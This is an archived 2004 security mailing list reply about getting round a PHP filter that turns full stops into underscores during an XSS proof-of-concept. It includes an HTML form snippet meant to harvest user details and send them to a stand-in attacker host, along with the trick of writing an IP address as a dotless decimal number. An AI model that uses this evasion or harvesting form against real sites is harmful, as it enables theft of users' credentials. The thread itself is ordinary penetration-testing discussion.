WebApp Sec mailing list archives
RE: Fullstop Substitution in XSS
From: "Pete Foster" <petef () sec-tec co uk>
Date: Tue, 1 Jun 2004 09:02:20 +0100
Hi Calum You could use a pure decimal for IP address representation. Use the online tool at: http://www.opinionatedgeek.com/DotNet/Tools/CrazyIP/Default.aspx For example the IP address 192.168.0.1 can be represented as 3232235521. So your HTML FORM code would look like: <form target="http://3232235521/path/to/script"> Hope this helps. -- Pete -----Original Message----- From: Calum Power [mailto:enune () fribble net] Sent: 29 May 2004 05:49 To: webappsec () securityfocus com Subject: Fullstop Substitution in XSS Hi all, As a part of a recent Pen-Test, I came across an XSS vulnerabiity. The PHP script that has this vuln is filtering fullstops (.) and replacing them with underscores (_). Now, I'm trying trying to write a Proof-of-Concept, in which a (convincing) form would be outputted that could 'harvest' user details and send them to an attacker's webserver. My problem lies in the output of the form tags. Any: <form target="http://attacker.com/path/to/script"> is of course being filtered into: <form target="http://attacker_com/path/to/script"> Has anyone else had a similar problem? I've tried using hex and unicode encoding, to no avail (they get decoded before the filtering, obviously). Any help would be appreciated. Cheers, Calum -- Calum Power Cultural Jammer Security Enthusiast Hopeless Cynic enune () fribble net http://www.fribble.net __________________________________________________________________________ The contents of this e-mail are confidential and are intended solely for the use of the person to whom they are addressed. If you are not the intended recipient of this message please notify the sender and delete it immediately, disclosure of its content to any other person is prohibited and may be unlawful. Sec-Tec does not accept any responsibility for viruses and it is your responsibility to scan the e-mail and attachments. Any liability arising from any third party acting on information contained in this e-mail is hereby excluded. --------------------------------------------------------------------------
Current thread:
- Fullstop Substitution in XSS Calum Power (May 31)
- RE: Fullstop Substitution in XSS V. Poddubniy (Jun 01)
- RE: Fullstop Substitution in XSS Harry Metcalfe (Jun 01)
- RE: Fullstop Substitution in XSS Pete Foster (Jun 01)
- Re: Fullstop Substitution in XSS windo (Jun 01)
- Re: Fullstop Substitution in XSS Jonathan Stade (Jun 01)
- Re: Fullstop Substitution in XSS Liam Quinn (Jun 01)
- Re: Fullstop Substitution in XSS Joseph Birr-Pixton (Jun 01)
- <Possible follow-ups>
- RE: Fullstop Substitution in XSS Michael Silk (Jun 01)